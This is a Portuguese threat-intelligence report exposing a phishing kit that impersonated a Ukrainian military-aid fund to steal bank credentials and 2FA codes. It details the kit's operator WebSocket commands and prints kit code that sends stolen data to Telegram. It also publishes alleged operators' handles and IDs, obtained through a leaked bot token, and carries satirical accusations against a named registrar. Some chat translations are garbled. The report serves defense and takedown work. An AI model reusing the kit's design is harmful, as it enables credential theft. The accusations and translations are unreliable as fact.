Voltar às notícias
Ameaça Ativa — Relatório de Investigação

Rede de phishing relacionada à ajuda militar é desmascarada: 5 bancos foram alvo de ataques; os autores foram identificados

O Pipeline automatizado da PhishDestroy analisou detalhadamente uma operação de phishing que se passava por uma fundação de ajuda militar ucraniana — desde o registro do domínio até a identificação do operador — em questão de minutos.

25 de março de 2026 Pesquisa PhishDestroy 12 minutos de leitura
Captura de tela 1 — Visão geral da investigação: rede de phishing dopomogvoina[.]sbs que tem como alvo veteranos militares ucranianos.
5
Bancos visados
3
Operadores identificados
6
Chamadas de API para desmascarar
2
Projetos paralelos de phishing
<30
Análise completa em poucos minutos
Divulgação sobre patrocinadores(clique para expandir)
Apresentamos o patrocinador oficial desta investigação
🏆 NiceNIC International Group Co., Limited 🏆
O mais oficial registrar que colabora com a Netcraft (enganando o sistema deles) · Fornecedor oficial de domínios para o Mercado de drogas Kraken · Fornecedor com descontos por volume · Fã dedicado do "O Vigarista Típico" Comunidade do VK — mas ainda não comprou um curso sobre anonimato
⭐ 1.8
Trustpilot
Avaliação
$200
preço .ru
120₽ reais
0
Denúncias de abuso
executado
15,000%
Domínio
marcação
  • Apesar de se declarar “chinês” (de Hong Kong), o criador é de Gorlovka, República Popular de Donetsk. A marca chinesa é puramente decorativa — assim como os Termos de Serviço deles
  • Mantém Suporte ao idioma russo pelo VKontakte e pelo Telegram, vende .ru por US$ 200, enquanto a reg.ru cobra 120₽ (~$1.30)
  • Avaliações negativas no Trustpilot que mencionam domínios relacionados ao mercado de drogas desaparecerem misteriosamente. Coincidência? De jeito nenhum
  • Um assinante ativo de "O Vigarista Típico" (Fraudador típico) Comunidade do VK — quando seu registrador segue grupos de golpistas, você sabe qual é o público-alvo deles
  • Colabora com Netcraft apenas o suficiente para evitar o cancelamento do registro, ao mesmo tempo em que mantém a infraestrutura para domínios relacionados a phishing, jogos de azar e narcóticos

Enquanto isso, no programa “Типичный Мошенник”:

Original (russo)
Traduzido (inglês)
Uma promessa ao nosso patrocinador: Quando essa postagem do “Типичный Мошенник” se tornar realidade — e, com base no que sabemos, é só uma questão de quando, não se — toda a nossa equipe vai se cadastrar no VKontakte e se inscrever na comunidade. Considere isso como nossa ovação de pé. 👏

* Trata-se de uma sátira. A NiceNIC não patrocinou esta investigação. No entanto, foi ela quem a tornou necessária ao se recusar a tomar medidas em relação às nossas denúncias de abuso por mais de 5 dias. Tudo o que foi mencionado acima se baseia em informações disponíveis publicamente e em nossa experiência operacional. Leia nossa reportagem completa sobre a NiceNIC →

O que o PhishDestroy descobriu

Em 20 de março de 2026, o Pipeline automatizado de detecção de ameaças do PhishDestroy sinalizou dopomogvoina[.]sbs — um domínio recém-registrado que hospeda um site de phishing que se faz passar por "O Escudo do Defensor" (Escudo do Defensor), uma falsa fundação de ajuda militar ucraniana. O site tem como alvo veteranos militares ucranianos, feridos em combate e as famílias de soldados mortos em serviço, prometendo ajuda financeira do governo enquanto rouba credenciais bancárias de cinco dos maiores bancos da Ucrânia.

A seguir, apresentamos uma análise detalhada de tudo o que nossa análise automatizada revelou: a engenharia social, a infraestrutura técnica, o sistema de controle em tempo real dos operadores e as identidades das pessoas responsáveis por operá-lo.

Avaliação de Impacto
O site tem como alvo específico os mais vulneráveis: veteranos de combate com TEPT, familiares de soldados mortos em combate que buscam auxílio do governo e militares feridos que precisam lidar com sistemas burocráticos complexos. Cada credencial roubada pode resultar na apropriação total da conta em questão de minutos.

Seção 1: A isca — Fundação de Ajuda Militar Falsa

O domínio dopomogvoina[.]sbs foi registrado em 20 de março de 2026 por meio de NiceNIC International Group Co., Limited, um registrador com um histórico bem documentado de respostas lentas ou inexistentes a denúncias de abuso. O .sbs O TLD (Side-By-Side) é um gTLD de baixo custo frequentemente utilizado para infraestruturas de phishing descartáveis.

O site se apresenta como um portal profissional de assistência ligado ao governo. Uma bandeira ucraniana ocupa todo o cabeçalho, imagens militares conferem autenticidade, e o texto da página está cuidadosamente redigido em ucraniano, com uma linguagem burocrática que reflete a dos programas governamentais legítimos.

Página inicial do site de phishing “dopomogvoina”, que apresenta uma falsa fundação de ajuda militar
Captura de tela 5 — Página inicial do site de phishing que se faz passar por “Щит Захисника” (Escudo do Defensor).

Para criar credibilidade, os operadores criaram um contador de estatísticas exibido de forma destacada na página inicial:

  • 2.847 inscrições — o que sugere que milhares de pessoas já receberam ajuda
  • ₴47,2 milhões distribuídos — um número elevado, mas plausível, na UAH
  • 19 programas — sugerindo uma operação abrangente e envolvendo vários programas

Esses números são totalmente inventados, inseridos diretamente no código-fonte da página, sem qualquer conexão com o backend. Eles têm um único objetivo: servir como prova social para superar a hesitação da vítima.

Seção 2: A Armadilha — 5 bancos, um objetivo

Após clicar em “Подати заявку” (Enviar Inscrição), a vítima é direcionada para uma tela de seleção de banco. Cinco dos maiores bancos de varejo da Ucrânia aparecem como opções, cada um com sua identidade visual e logotipo oficiais. É nesse momento que a engenharia social passa da manipulação emocional para o roubo técnico.

Tela de seleção de bancos exibindo 5 bancos ucranianos
Captura de tela 6 — Tela de seleção do banco. Cada opção leva a uma sequência personalizada de roubo de credenciais.

A análise do pacote de JavaScript do site revelou que cada banco possui um sequência exclusiva de coleta de credenciais em várias etapas, adaptado para se adequar ao fluxo de autenticação real desse banco:

PrivatBank

EntrarSenhaPINSMS

monobank

EntrarPINSMSE-mail

Oschadbank

EntrarVerificarSMS

PUMB

EntrarSMS

Ukrsibbank

EntrarPINSMS

O fluxo do ataque para cada banco segue o mesmo padrão:

Página falsa de ajuda humanitária
Seleção do banco
Clone de login
Interceptação da autenticação de duas etapas (2FA)
Apropriação de conta
Página de login falsa do PrivatBank
Captura de tela 7 — Página de login clonada do PrivatBank.
Página de login falsa do PUMB
Captura de tela 9 — Login do PUMB clonado.
Diagrama de fluxo do ataque mostrando as etapas do phishing, desde a página falsa de ajuda até a invasão da conta
Captura de tela 10 — Fluxo completo do ataque: desde a página falsa de ajuda militar, passando pela seleção do banco, até o roubo de credenciais e a invasão da conta.

A pilha de tecnologias: SPA em React interface fornecida por meio de CDN da Cloudflare, com um Express.js back-end responsável pelo roubo de credenciais. A arquitetura do React permite a criação de formulários de várias etapas que se integram perfeitamente, parecendo indistinguíveis das interfaces bancárias legítimas.

Seção 3: Controle do operador em tempo real

Este não é um simples coletor de credenciais com um banco de dados estático. O kit de phishing inclui um painel de controle WebSocket em tempo real que permite que um operador humano manipule cada sessão da vítima em tempo real.

O ponto de extremidade do WebSocket em wss://dopomogvoina[.]sbs/ws suporta os seguintes tipos de mensagem:

register          — New victim session created
update_user_data  — Stolen credentials transmitted to operator
next_step         — Operator advances victim to next theft stage
create_application — Victim starts "aid application"
answer_question   — Operator sends custom prompt to victim

Esse controle em tempo real permite que o operador:

  • Forçar um estado de espera — exibir a mensagem “Processando sua solicitação...” enquanto eles fazem login na conta bancária real da vítima
  • Redirecionar para uma etapa específica — solicitar novamente um código por SMS caso o primeiro tenha expirado
  • Mostrar mensagens de erro falsas — “Código inválido, insira novamente” para coletar vários tokens de autenticação de duas etapas
  • Faça perguntas personalizadas — solicitar data de nascimento, número do cartão ou quaisquer outros dados durante a sessão
O que torna isso perigoso
O controle em tempo real por parte do operador contorna as proteções de autenticação de dois fatores (2FA) baseadas em tempo. O operador intercepta o código enviado por SMS e o utiliza dentro do seu período de validade — normalmente de 30 a 120 segundos — enquanto a vítima fica olhando para uma animação falsa de “processamento”.
Formulário de inserção de número de telefone em página de login de banco falsa
Captura de tela 8 — Formulário de inserção de número de telefone usado para iniciar o roubo de credenciais.
Painel de controle do operador baseado em WebSocket
Captura de tela 11 — Painel do bot em tempo real do operador para controlar as sessões das vítimas.

A gama completa de dados roubados por sessão: phone, password, PIN, SMS code, card number, date of birth, e email.

Seção 4: Por trás do Cloudflare — Dois projetos, um servidor

O proxy da Cloudflare oculta o servidor de origem, mas a Pipeline de análise de infraestrutura do PhishDestroy identificou o verdadeiro endereço IP de origem: 45.131.214[.]148, hospedado em RapidSeedbox / LeaseWeb na Holanda.

Um detalhe importante: dopomogvoina[.]sbs é encaminhado por meio de Cloudflare, ocultando seu endereço IP de origem. Mas nosso sistema também rastreia hlpforvpeople[.]sbs — um domínio relacionado registrado pelo mesmo registrador NiceNIC, com padrões correspondentes. Esse domínio é NÃO está atrás do Cloudflare, expondo diretamente seu endereço IP de origem: 45.131.214[.]148.

Conectando-se diretamente a este IP — sem um Host cabeçalho — revelou algo inesperado: um site de phishing totalmente diferente. Em vez da ajuda militar à Ucrânia, o vhost padrão serviu "Identificação de Saúde", uma operação de phishing relacionada a um plano de saúde indonésio. O mesmo servidor, vítimas completamente diferentes, país completamente diferente.

Mesmo servidor, mesmos operadores, vítimas diferentes
  • Projeto 1: Ajuda militar ucraniana → rouba credenciais bancárias de veteranos
  • Projeto 2: Seguro de saúde indonésio → rouba dados de identificação de saúde dos cidadãos
  • A mesma pilha do Express.js, o mesmo painel de controle em tempo real via WebSocket
  • A mesma interface de gerenciamento de servidor BT-Panel (宝塔)
  • Domínio C2 do segundo projeto: rezervtemka[.]cc — um painel de phishing conhecido, identificado no banco de dados de ameaças do PhishDestroy
  • Comentários em russo no código-fonte do projeto indonésio, confirmam os mesmos desenvolvedores do CIS
Dois projetos de phishing em execução no mesmo servidor — ajuda militar à Ucrânia e seguro de saúde na Indonésia
Captura de tela 12 — Duas operações paralelas de phishing que compartilham o mesmo servidor de origem: ajuda militar ucraniana (dopomogvoina) e seguro de saúde indonésio (HealthCare ID).

O modelo de phishing indonésio é um kit conhecido rastreado no banco de dados de inteligência de ameaças do PhishDestroy. Vimos variantes desse mesmo modelo sendo utilizadas em todo o Sudeste Asiático — visando instituições financeiras da Indonésia, da Tailândia e do Vietnã. Os operadores simplesmente trocam os modelos específicos de cada país, reutilizando a mesma infraestrutura de back-end.

Criminosos sem escrúpulos
Essa é a realidade das operações modernas de phishing: os criminosos não se importam de quem roubam. Veteranos ucranianos em busca de ajuda militar, trabalhadores indonésios adquirindo plano de saúde — o alvo muda de acordo com o modelo que gerar mais receita. Os mesmos operadores que falam russo conduzem ambas as campanhas simultaneamente a partir do mesmo servidor, alternando entre vítimas em diferentes países como se estivessem mudando de canal na TV. Hoje são os bancos ucranianos. Amanhã podem ser os bancos israelenses — como Bonya já havia perguntado em março de 2026.

Seção 5: O arquivo config.json que revelou tudo

Veja a seguir como um único arquivo mal configurado desestruturou toda a operação — passo a passo.

Após identificar o segundo projeto do servidor de origem, o PhishDestroy’s JS Analyzer — nossa ferramenta automatizada de análise de JavaScript — foi direcionada ao pacote do site de phishing indonésio em https://45.131.214[.]148/assets/index-ZMQxHb_h.js. O analisador extraiu todos os endpoints de API, URLs externas e caminhos de configuração do arquivo JavaScript de 335 KB. Entre as descobertas:

  • Cinco pontos de extremidade da API em rezervtemka[.]cc — o painel C2 para verificação de credenciais
  • Uma conexão WebSocket com wss://rezervtemka[.]cc
  • Integração do Facebook Pixel para rastreamento de vítimas
  • Uma referência a /config.json — carregado em tempo de execução para a configuração do bot do Telegram

Seguindo essa pista, buscamos /config.json a partir do endereço IP de origem. O arquivo estava acessível sem qualquer autenticação — localizado na raiz do site, legível por qualquer pessoa:

async function loadConfig() {
  const response = await fetch('/config.json');
  // ...
}
async function sendNotification() {
  const cfg = await loadConfig();
  await fetch(`https://api.telegram.org/bot${cfg.bot_token}/sendMessage`, {
    method: 'POST',
    body: JSON.stringify({ chat_id: cfg.chat_id, text: message })
  });
}

O /config.json o arquivo estava acessível diretamente a partir do IP de origem — sem autenticação, sem controle de acesso, apenas um arquivo JSON simples localizado na raiz do site:

{
  "bot_token": "8724623843:AAFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
  "chat_id": "-100XXXXXXXXXX"
}

Um token de bot do Telegram funciona tanto como nome de usuário quanto como senha. Quem tiver o token pode fazer chamadas à API como se fosse esse bot. Os operadores deixaram o token deles em um arquivo de acesso público. Após seis chamadas à API, já tínhamos tudo:

getMe — Identidade do bot: “MonettiCRM” (@MonettiCRM_bot)
getChat(chat_id) — Nome do grupo: “Idr card”, com um link de convite ativo
getChatAdministrators — 3 administradores, incluindo o criador do grupo
getChat(creator_id) — Criador: @monettiescobar, Telegram Premium, perfil empresarial, fuso horário UTC+3
getChat(admin2_id) — Segundo administrador: perfil vazio, suspeita de conta alternativa
getChatMemberCount — 5 membros no total no grupo de operadores
Cadeia de OSINT mostrando 6 chamadas à API do Telegram, desde o arquivo config.json até a identificação completa do operador
Captura de tela 13 — A cadeia completa de OSINT: do arquivo config.json exposto até a identificação completa do operador em 6 chamadas de API.

De um único arquivo mal configurado à identificação completa dos operadores em seis solicitações HTTP. Sem explorações, sem acesso não autorizado — apenas chamadas padrão da API do Telegram Bot usando um token que os próprios operadores deixaram exposto.

Seção 6: Os operadores

Uma reflexão sobre a criatividade criminosa

O que se segue é uma aula magistral sobre escolhas péssimas de aliases. Temos MONETTI ESCOBAR — porque nada transmite mais “discrição” do que dar a si mesmo o nome do traficante mais famoso da história. E depois tem Bonya, também conhecido como PapaZakonVor (literalmente “Papai-Ladrão-por-Lei” — uma tentativa de referência à hierarquia do crime russo), Boa, e bubullikk. E, por fim, Devoys, cujo apelido @devosus parece suspeitosamente com “dev ops us” — um desenvolvedor que colocou o cargo dele no nome de usuário. Essas são as pessoas que acharam que poderiam enganar a inteligência automatizada contra ameaças. Spoiler: não conseguiram.

Grupo de operadores do Telegram “Idr card” foi exposto por meio de um token de bot
Captura de tela 14 — O grupo de operadores do Telegram “Idr card”, exposto por meio do token do bot que vazou.
Avatar do MONETTI ESCOBAR no Telegram
Proprietário / Criador
MONETTI ESCOBAR
@monettiescobar
ID do Telegram: 8135223234
Telegram Premium, Perfil empresarial
Fuso horário: UTC+3 (região da CEI)
10 mensagens públicas — OPSEC rigorosa
TraFFeeQ ChatMedusa Google AdsCanal sobre deepfakes
Avatar do Bonya no Telegram
Operador / Tráfego
Bonya
@BoaCC159
ID do Telegram: 6242202706
Também conhecido como: PapaZakonVor, Boa, bubullikk
261 mensagens em 12 grupos
DC2 — Amsterdã, NL
CryptoGrabMercado STYXRaven CCCHAT DO IMPÉRIOSolução Phoenix
Desenvolvedor / Programador
Devoys
@devosus
ID do Telegram: 8213612730
Desenvolvedor de kits de phishing — os operadores se referem a ele como “programador”
Solicitado a “pensar em medidas de defesa” quando a violação foi descoberta
Impacto público mínimo por concepção
Alça @devosus ≈ “dev ops us” — cargo como nome de usuário
Desenvolvedor de kitsInfraestruturaSegurança

MONETTI ESCOBAR — O Chefe

A MONETTI mantém uma rigorosa segurança operacional — apenas 10 mensagens públicas em dois grupos. Mas os grupos revelam o que aconteceu: TraFFeeQ Chat (arbitragem de tráfego para fins de fraude), Medusa Google Ads (práticas de black-hat no Google Ads) e um Canal sobre deepfakes. Seu perfil comercial no Telegram indica “Есть предложение” ("Tenho uma proposta") — anunciando abertamente seus serviços. O fuso horário UTC+3 (correspondente a Moscou/Minsk/Kiev) e o horário de atendimento 24 horas por dia, 7 dias por semana, confirmam que se trata de uma operação sediada na CEI que funciona ininterruptamente.

Bonya — O Descuidado

Ao contrário da rigorosa segurança operacional (OPSEC) de MONETTI, Bonya (antigo pseudônimo: PapaZakonVor — algo como “DaddyThiefByLaw”) deixou um enorme rastro digital — 261 mensagens distribuídas por 12 grupos clandestinos. Seu histórico de bate-papo parece um currículo criminoso:

Palavras do próprio Bonya (traduzidas do russo)
  • "fichas para corrente de 2,0""Apenas phishing para [segurança bancária] 2.0" — discutindo a compatibilidade dos kits de phishing com os sistemas de segurança bancários mais recentes
  • "É difícil encontrar itens legais""É difícil encontrar bons 'mulas' para transporte de dinheiro" — recrutamento de cúmplices para a retirada de dinheiro
  • "Vamos para o centro cultural trabalhar comigo""Venha trabalhar no meu call center" — recrutamento de operadores
  • "Alguém aqui já trabalhou com bancos de Israel?""Alguém aqui já trabalhou com bancos israelenses?" — expansão para novos alvos (março de 2026)
  • "Não vejo muitos logotipos na Finke""Não vejo muitos registros financeiros" — discutindo a qualidade das credenciais roubadas
  • "Se 1 proxy for 1-2 bancos de corrente""Um representante para apenas 1 ou 2 bancos" — discutindo a segurança operacional no combate à fraude bancária
  • "O caixa eletrônico reteve o cartão dela""O cartão dela ficou preso no caixa eletrônico" — um “mulas de dinheiro” roubou ₴60.000 deles, alegando que o caixa eletrônico havia engolido o cartão. Até mesmo os criminosos são vítimas de golpes por parte de seus próprios cúmplices.

Suas filiações a grupos traçam um quadro completo: CryptoGrab (ladrões de carteiras de criptomoedas), Mercado STYX (mercado clandestino de dados roubados), Verificador do Raven CC (ferramentas de validação de cartão de crédito), CHAT DO IMPÉRIO e Solução Phoenix (coordenação de fraudes). Não se trata de um infrator ocasional — trata-se de alguém que está inserido no ecossistema do crime cibernético.

Devoys — O desenvolvedor

A espinha dorsal técnica da operação. Projetado para causar o mínimo impacto público — quando o grupo foi invadido, Bonya o chamou explicitamente: "@devosus, pensa na defesa antes que a gente leve uma surra""@devosus, vamos pensar na defesa antes que a gente leve uma surra." Sua resposta sarcástica à violação — "quando na Interpol" ("quando fazer a interpolação") — o que sugere que essa não é a primeira vez que eles passam por uma situação de risco.

Análise comportamental: 261 mensagens decodificadas

O Pipeline de OSINT da PhishDestroy coletou e traduziu todas as 261 mensagens públicas de Bonya, em 12 grupos subterrâneos do Telegram (junho de 2024 — março de 2026). Tradução automática via API do DeepL com correção manual do contexto. As mensagens revelam um perfil operacional completo — categorizado abaixo por tipo de atividade criminosa.

Distribuição de mensagens: 261 mensagens em 12 grupos
  • 💬ONE|Bate-papo — 91 mensagens (coordenação de fraudes)
  • Notícias/Verificações — 37 mensagens (golpes de verificação)
  • Rolex | chat geral — 28 mensagens (carding)
  • CHAT DO IMPÉRIO — 24 mensagens (mercado negro)
  • Fbstor — 23 mensagens (arbitragem de tráfego)
  • FB-DOC — 22 mensagens (fraude publicitária)
  • Solução Phoenix — 17 mensagens (fraude bancária)
  • CryptoGrab — 11 mensagens (drenagem de criptomoedas)
  • Mercado STYX — 2 mensagens (mercado clandestino)
  • Verificador do Raven CC — 2 mensagens (verificação de cartão)

Fraude bancária e phishing

💬ONE|Bate-papoMarço de 2025
"Só tem 2,0 phish aqui"
E aqui estão os fusíveis para corrente de 2,0
Discussão sobre a compatibilidade dos kits de phishing com os protocolos de segurança bancários mais recentes
💬ONE|Bate-papoMarço de 2025
"Cara, aqui não vendem nada no Phish, é o Phish para pagamentos"
Cara, aqui não vendem nada com fichas; aqui as fichas são para pagamento
Diferenciando entre “phishing para venda” e “phishing para roubo direto”
Solução PhoenixMarço de 2026
"Tem alguém aqui que já tenha trabalhado com bancos em Israel?"
Alguém aqui já trabalhou com bancos de Israel?
Expansão das operações para o setor bancário israelense — 5 dias antes de nossa investigação
Rolex | chat geralSetembro de 2024
"Se houver 1 representante, apenas 1 ou 2 bancos"
Se 1 proxy for 1-2 bancos de corrente
Segurança operacional contra fraudes envolvendo vários bancos: um proxy para cada 1 a 2 bancos, a fim de evitar a detecção
Rolex | chat geralSetembro de 2024
"Não vejo muitos registros financeiros"
Não vejo muitos logotipos na Finke, na verdade
Reclamações sobre a qualidade das credenciais bancárias roubadas nos mercados clandestinos

“Money Mules” e “Cash-Out”

💬ONE|Bate-papoMarço de 2025
"É difícil encontrar bons lançamentos"
É difícil encontrar itens bons
“Drops” = intermediários que levantam fundos roubados. Reclamando da dificuldade de recrutamento.
💬ONE|Bate-papoMarço de 2025
"Venha trabalhar no meu call center"
Vamos para o centro cultural trabalhar comigo
Recrutamento ativo de pessoas para uma operação de call center fraudulenta
AtualJunho de 2024
"Nos roubaram 60 mil"
Roubaram 60 mil de nós
Um “mulas de dinheiro” roubou ₴60.000 dos próprios golpistas. Justiça irônica.
AtualJunho de 2024
"Como diabos um caixa eletrônico pode engolir o cartão?"
Como diabos o caixa eletrônico conseguiu engolir o cartão?
O intermediário alegou que o caixa eletrônico “engoliu” o cartão para ficar com o dinheiro roubado. Golpistas enganando outros golpistas.
AtualJunho de 2024
"Ela transferiu o dinheiro para nós, mas não tínhamos a conta principal para transferir o dinheiro"
Ela repassou isso para nós, mas, nesse momento, não tínhamos o meio de pagamento principal para transferir o dinheiro
Descrição da cadeia de saque: vítima → conta intermediária → “mula” financeira principal

Fraude de tráfego e uso indevido de anúncios

CHAT DO IMPÉRIOMarço de 2026
"Não uso o Google, só o Facebook"
Bem, eu não trabalho com o Google, só com o Facebook
É especialista em fraudes em anúncios do Facebook — direcionando tráfego para páginas de phishing
FB-DOCFevereiro de 2026
"Eu também não investiria % do orçamento publicitário sem um fiador"
Eu também não investiria com base em uma porcentagem dos gastos sem uma garantia
Negociação das condições de pagamento para a veiculação de campanhas publicitárias fraudulentas no Facebook
CryptoGrabJaneiro de 2025
"Tentei usar o AML no Facebook para segmentar o mercado americano — mas não consegui encontrar nenhuma configuração adequada na internet"
Tentei procurar no Facebook, mas não encontrei nem mesmo grupos antigos que fizessem sentido na internet.
Tentativa de usar anúncios no Facebook para promover golpes relacionados à lavagem de dinheiro, tendo como alvo vítimas nos EUA
Perfil psicológico: Bonya

O corpus de 261 mensagens revela um cibercriminoso de nível médio com atividades diversificadas: phishing bancário, redes de “money mules”, fraude em anúncios do Facebook, roubo de criptomoedas e fraudes com cartões de crédito. Principais características:

  • Descuido operacional — 261 mensagens enviadas em grupos públicos usando uma única conta. O uso de vários pseudônimos (PapaZakonVor → Boa → Bonya) sugere conhecimento das normas de segurança operacional (OPSEC), mas falha em colocá-las em prática
  • Mentalidade de recrutamento — convida ativamente as pessoas a “trabalharem no meu call center” e vende conhecimentos operacionais em troca de dinheiro
  • Indiferença em relação às vítimas — aborda alvos ucranianos, europeus, israelenses e americanos com o mesmo distanciamento. A geografia é apenas uma variável na equação da fraude
  • Problemas de confiança — foi traído por seu próprio “mulo” por ₴60 mil. Isso reflete, ironicamente, a desconfiança que ele gera em suas vítimas
  • Impulsionado pela expansão — ainda em março de 2026, buscando ativamente novos mercados bancários (Israel), o que sugere que o ataque de phishing na Ucrânia é apenas uma das muitas operações em andamento
Bonya: Histórico completo de mensagens (253 mensagens em 12 grupos)
Bonya (@BoaCC159) — Histórico completo das mensagens traduzidas
-- Phoenix Solution (16 mensagens) --
B
Bonya2026-03-17 14:22
Tem alguém aqui que já tenha trabalhado com bancos em Israel?Alguém aqui já trabalhou com bancos de Israel?
B
Bonya2026-03-17 14:22
trabalhando em silêncio também.nós também trabalhamos discretamente
B
Bonya2026-03-17 14:17
E aí, tudo bem?E aí, tudo bem?
B
Bonya2026-03-17 14:17
Olá a todosOlá a todos
B
Bonya2026-03-15 19:02
Bem, agora já está praticamente tudo resolvido.Bem, no geral, já resolveram tudo
B
Bonya2026-03-15 19:02
Bem, é um pouco trabalhosoBem, acabamos de criar um pouco de confusão
B
Bonya2026-03-15 19:01
É, eu também tenho trabalhado bastante nos bastidores, que merda.É, também estou de saco cheio de tanto trabalhar nas escondidas
B
Bonya2026-03-15 19:00
Como foi o seu dia de folga?Como foi o fim de semana?
B
Bonya2026-03-15 19:00
Todos vocês.A todos em geral
B
Bonya2026-03-14 14:29
Ele não é mais tão anônimo agora que todo mundo sabe que é o Marik.Ele já não é tão anônimo assim, já que todo mundo sabe quem é esse cara
B
Bonya2026-03-14 14:24
RenascidoRenascido
B
Bonya2026-03-14 14:24
Ahahahahahahahahahahahahahahahahahahahahahahahahah.Ahahahahahahahah
B
Bonya2026-03-14 14:23
Fiquei chateado quando vi que a sala de bate-papo tinha sumido.Fiquei até chateado quando vi que o chat tinha sumido
B
Bonya2026-03-14 14:22
Achei que nunca fosse te encontrar.Eu já achava que não ia encontrar vocês
B
Bonya2026-03-14 14:22
KooКу
B
Bonya2026-03-14 14:22
Foda-seCaramba
-- 👨‍⚕️ FB-DOC — Chat sobre arbitragem de tráfego (21 mensagens) --
B
Bonya2026-03-15 07:23
@fbdoc21@fbdoc21
B
Bonya2026-03-15 07:20
Dê uma batida na sua testa com o seu pênis.Vou bater uma na minha testa
B
Bonya2026-03-06 15:18
Tipo, cinco na tela de 2,5😂.É como um 5 na tela 2,5😂
B
Bonya2026-02-19 17:05
a todos vocês.A todos vocês
B
Bonya2026-02-19 17:04
Se você fechar um negócio, vou rir.Se você abrir uma posição, eu vou rir
B
Bonya2026-02-19 17:04
continental?continental?
B
Bonya2026-02-19 17:04
Então, lá está ela.Então, veja só, ela concordou
B
Bonya2026-02-19 17:01
Portanto, sempre verifique os antecedentes quando solicitar um fiador.Então, verifique sempre isso quando perguntar sobre a garantia
B
Bonya2026-02-19 17:00
Ele perguntou sobre um fiador e sumiu na hora.Ele perguntou sobre o fiador e sumiu na hora
B
Bonya2026-02-19 17:00
ay, CarinaOi, Karina
B
Bonya2026-02-19 16:59
Então você vai procurar um fiador?Então, você vai apostar nisso?
B
Bonya2026-02-19 16:57
Eu também não concederia um empréstimo com base em uma porcentagem dos gastos sem um fiador.Eu também não investiria com base em uma porcentagem dos gastos sem uma garantia
B
Bonya2026-02-19 16:57
eu?eu?
B
Bonya2026-02-19 16:57
Bem, ela mandou capturas de tela e você não me mandou nada.Bem, ela postou as capturas de tela, mas você não mandou nada
B
Bonya2026-02-19 16:56
dá uma olhada nas capturas de tela que ela mandouDá uma olhada nas capturas de tela que ela mandou
B
Bonya2026-02-19 16:55
Ele não falou nada sobre um fiador?Ele não escreveu nada sobre o fiador?
B
Bonya2026-02-19 16:54
Você é um maluco😂Que esquisito você é, né? 😂
B
Bonya2026-02-19 16:53
você pediu um fiador.Você pediu ao fiador
B
Bonya2026-02-19 16:52
ondeem que lugar
B
Bonya2026-02-17 14:37
Quem vai arranjar umas boas máquinas para a oficina?Quem vai me dar uma carona, com carros legais?
B
Bonya2026-02-17 12:10
Em qualquer lugar que você quiser, eles fazem isso pra você😂Em qualquer lugar que você quiser, eles fazem do jeito que você quiser😂
-- CHAT DO IMPÉRIO (24 mensagens) --
B
Bonya2026-03-14 13:17
Já descobri como fazer, mas estou com preguiça de explicar.Eu já entendi como funciona, mas estou com preguiça de explicar
B
Bonya2026-03-14 13:17
Ele vai te dar uma surra, não importa o que aconteça.Ele vai te enrolar de qualquer jeito
B
Bonya2026-03-12 17:16
De maneiras diferentes.De várias maneiras
B
Bonya2026-03-12 17:08
+ além disso, há muitas tempestades acontecendo neste momento.+ Agora há tempestades fortes
B
Bonya2026-03-12 17:07
Se for preto, aposto que...Se fosse preto, eu teria apostado
B
Bonya2026-03-12 17:07
Depende do tipo de oferta; se for branca, sim.Depende da oferta; se for a branca, sim
B
Bonya2026-03-12 17:06
São dois mundos diferentesDois mundos diferentes, isso é
B
Bonya2026-03-12 17:06
Não tem outroNão há absolutamente nenhuma outra
B
Bonya2026-03-12 17:06
Você pode configurar para que apenas os PCsLá é possível configurar para que apareçam apenas os PCs
B
Bonya2026-03-12 17:05
O Google não é tão eficaz quanto eu acho que é.O Google não é tão eficaz quanto eu acho
B
Bonya2026-03-12 17:05
Bem, eu não uso o Google, só o Facebook.Bem, eu não trabalho com o Google, só com o Facebook
B
Bonya2026-03-12 17:05
Desde que você tenha que encontrar uma ligadura durante todo o processo.Desde que ainda seja preciso juntar todas essas bobagens em um pacote
B
Bonya2026-03-12 17:04
Rejeições, ackeys voando por aí como tempestades. E assim por diante.Rejeitos, as contas são eliminadas assim, como se fossem tempestades. E assim por diante
B
Bonya2026-03-12 17:04
Não é só alegria, cara.Não é só isso, mano, é só o começo
B
Bonya2026-03-12 17:03
Todas as aquisições regulares de passagens aéreas com maior confiançaTodas as baterias comuns com a melhor confiança
B
Bonya2026-03-12 17:03
Não há agências boas no mercado no momento.Não há boas agências no mercado no momento
B
Bonya2026-03-12 17:02
Mais angustiante do que assustadorÉ mais estresse do que medo
B
Bonya2026-03-12 17:02
Criptomoedas, instinto de jogador e negritude, tudo isso vem à tonaCriptomoedas, jogos de azar e coisas obscuras, tudo rola
B
Bonya2026-03-12 17:01
A última ação da prefeitura foi invadir o 2d.A última coisa que apareceu na cidade em 2D foi incrível
B
Bonya2026-03-12 17:01
Se você me procurar, seja por conta própria ou com o orçamento disponível, vai ver que os projetos de escalada em 2D exigem um gasto de 1 a 2 mil zeles em testes, e isso não vai durar muito tempo.Dá pra fazer, se você procurar com recursos próprios ou do orçamento; mas, pra descobrir o que funciona em 2D, é preciso gastar 1 a 2 mil zel em testes, e mesmo assim não vai durar muito tempo.
B
Bonya2026-03-12 17:00
Estou servindoEstou derramando
B
Bonya2026-03-12 16:59
(já que não existem tais exigências para as ofertas brancas)Porque não há esses requisitos para ofertas brancas)
B
Bonya2026-02-14 14:33
Quem tem um “dreiner” no teste AML? Somente com DEP ou quando o fiador estiver prontoAlguém tem um drenador para o teste AML? Só com depósito ou já prontos para o garantidor?
B
Bonya2026-01-11 03:14
Tem alguém no grupo do Facebook e tem um amigo. Preciso reabastecer o Facebook; o preço é negociável.Tem gente que já postou no Facebook, e tem palavrões. Preciso recarregar o Facebook; quanto ao preço, a gente combina.
-- SТYХ СНAT [ STYXMARKET.ST ] (2 mensagens) --
B
Bonya2025-12-05 12:04
Preciso de faturas, Payzaty, Cashfree, Eportal 3dsPreciso de faturas, Payzaty, Cashfree, Eportal 3ds
B
Bonya2025-11-22 11:14
Existe um moderador no chat?Tem alguém responsável pelo chat aqui?
-- Chat sobre arbitragem de tráfego (2 mensagens) --
B
Bonya2025-11-24 14:50
100%100%
B
Bonya2025-11-24 14:49
O canal Tg será sequestradoO canal do Telegram vai ser hackeado
-- Verificador do Raven CC (2 mensagens) --
B
Bonya2025-11-21 21:19
/help@SDBB_Bot/help@SDBB_Bot
B
Bonya2025-11-21 21:18
/check/check
-- Navegador Vision Chat (2 mensagens) --
B
Bonya2025-11-14 16:47
Obrigado.Obrigado
B
Bonya2025-11-14 16:47
O trabalho do Vicen está em ru?trabalho visual em russo?
